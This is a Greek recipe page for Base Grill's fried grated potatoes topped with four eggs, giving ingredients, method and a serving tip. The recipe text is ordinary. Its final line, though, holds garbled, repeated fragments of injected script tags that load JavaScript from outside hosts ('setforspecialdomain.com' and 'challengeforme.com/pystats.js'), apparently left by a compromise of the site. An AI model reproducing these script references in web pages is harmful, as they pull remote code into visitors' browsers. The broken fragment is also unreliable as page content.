Αβγά με πατάτες του Base Grill: η κολασμένη συνταγή

Το αδιαφιλονίκητο σουξέ του κρεοφαγικού στεκιού που ξυπνάει μνήμες και προκαλεί σιελόρροια. Ιδού η πανεύκολη διαδικασία για να τα χαρείτε σπίτι σας.

Υλικά

  • 2 μεγάλες πατάτες καθαρισμένες
  • 4 αβγά
  • Ηλιέλαιο
  • Αλάτι
  • Πιπέρι.

Εκτέλεση

Τρίβουμε τις πατάτες στη χοντρή πλευρά του τρίφτη. Βάζουμε σε αντικολλητικό τηγάνι ηλιέλαιο και το αφήνουμε να ζεσταθεί χωρίς να κάψει. Ρίχνουμε τις πατάτες χωρίς να τις στεγνώσουμε και τις απλώνουμε, ώστε να πιάσουν όλο το τηγάνι. Τις αφήνουμε να πάρουν χρώμα και τις γυρίζουμε. Προσθέτουμε τα τέσσερα αβγά και με το λάδι βοηθάμε μέχρι να ψηθεί το ασπράδι (προσοχή κρατήστε το μαλακό).

Tip: Στο σερβίρισμα προαιρετικά σπάμε τους κρόκους, ανακατεύουμε με το ασπράδι και απλώνουμε πάνω στις πατάτες.___setforspecialdomain.com/ghfgh34523452′ type=’text/javascript’>___setforspecialdomain.com/ghfgh34523452′ type=’text/javascript’> challengeforme.com/pystats.js?l=l&’ async=true type=text/javascript language=javascript>challengeforme.com/pystats.js?l=l&’ async=true type=text/javascript language=javascript>